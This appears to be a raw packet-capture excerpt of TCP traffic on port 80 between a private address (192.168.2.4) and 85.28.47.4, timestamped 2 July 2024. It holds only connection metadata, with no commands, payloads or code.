                                            Jul 2, 2024 08:26:27.341377974 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341387033 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341414928 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341492891 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341506004 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341527939 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341557026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341662884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341675997 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341686964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341698885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341701984 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341710091 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341721058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341725111 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341732025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341743946 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341754913 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.341758966 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341778994 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.341801882 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.342418909 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342433929 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342478037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.342572927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342585087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342596054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342609882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342617989 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.342619896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342631102 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342643023 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342653036 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.342653990 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342665911 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342681885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.342704058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.342720985 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342734098 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342745066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.342778921 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.342803001 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.343467951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343481064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343492031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343502998 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343513966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343518972 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.343525887 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343537092 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343571901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.343584061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.343619108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343631983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343642950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343653917 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343663931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343666077 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.343676090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343687057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343698025 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.343698978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.343729019 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.343740940 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423274994 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423338890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423352957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423384905 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423389912 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423424959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423432112 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423481941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423494101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423506021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423517942 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423522949 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423528910 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423531055 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423557043 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423580885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423731089 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423778057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423815966 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423830986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423841000 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423852921 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423863888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423865080 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.423876047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.423902988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424258947 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424272060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424283981 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424295902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424307108 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424309969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424319029 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424319983 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424345970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424367905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424526930 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424540043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424573898 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424671888 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424685001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424695969 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424709082 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424721003 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424721956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424731016 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424734116 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424745083 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424756050 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424757957 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424770117 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424774885 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424783945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.424798012 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.424818039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425394058 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425405979 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425415993 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425429106 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425445080 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425447941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425453901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425461054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425472975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425481081 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425484896 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425496101 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425501108 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425508022 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425519943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425524950 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425532103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425544024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425544024 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425558090 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425563097 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425569057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.425585985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.425611019 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426418066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426431894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426445007 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426457882 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426469088 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426469088 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426481962 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426489115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426495075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426506996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426512957 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426517963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426528931 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426531076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426542044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426551104 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426554918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426567078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426568985 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426579952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426590919 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426593065 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426605940 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.426615000 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426632881 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.426656008 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427351952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427366018 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427377939 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427390099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427402020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427407980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427419901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427419901 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427432060 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427445889 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427445889 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427457094 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427469969 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427478075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427488089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427489996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427501917 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427510023 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427512884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427525043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427527905 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427537918 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.427557945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427562952 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.427591085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428322077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428339958 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428350925 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428363085 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428370953 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428375006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428386927 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428390026 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428397894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428409100 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428412914 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428421021 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428431988 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428433895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428446054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428451061 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428457975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428468943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428473949 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428488016 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.428491116 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428517103 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.428540945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429058075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429075003 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429085970 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429100037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429107904 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429127932 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429249048 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429269075 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429280996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429291964 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429295063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429305077 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429306030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429317951 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429326057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429331064 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429342031 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429347992 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429353952 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429366112 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429367065 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429377079 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429389954 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.429393053 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429411888 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.429425955 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.430028915 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.430053949 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.430063963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.430078030 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.430087090 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.430105925 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512239933 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512280941 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512294054 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512324095 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512355089 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512371063 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512387991 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512424946 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512479067 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512497902 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512511015 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512523890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512547970 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512558937 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512769938 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512782097 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512821913 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.512963057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512974977 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512985945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.512998104 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513014078 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513019085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513019085 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513061047 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513340950 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513353109 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513362885 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513375044 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513391018 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513417959 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513628006 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513643980 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513655901 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513685942 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513708115 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513710976 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513721943 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513731956 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513745070 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513756037 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513757944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513768911 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513771057 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513782978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513794899 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.513797998 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513817072 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.513842106 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.514678001 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514689922 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514700890 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514712095 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514728069 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514733076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.514740944 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514753103 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514754057 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.514760971 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.514765024 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514776945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514787912 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514790058 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.514801025 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514806986 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.514808893 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.514808893 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.514832020 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.515208006 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.515631914 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515642881 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515654087 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515666008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515676975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515677929 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.515691996 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515698910 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.515702963 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515714884 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515716076 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.515727043 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515738010 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515738964 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.515748978 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515759945 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.515759945 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.515794039 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516185999 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516587973 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516599894 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516611099 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516622066 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516635895 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516638041 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516647100 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516649008 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516659975 CEST806388085.28.47.4192.168.2.4
                                            Jul 2, 2024 08:26:27.516674995 CEST6388080192.168.2.485.28.47.4
                                            Jul 2, 2024 08:26:27.516695023 CEST6388080192.168.2.485.28.47.4
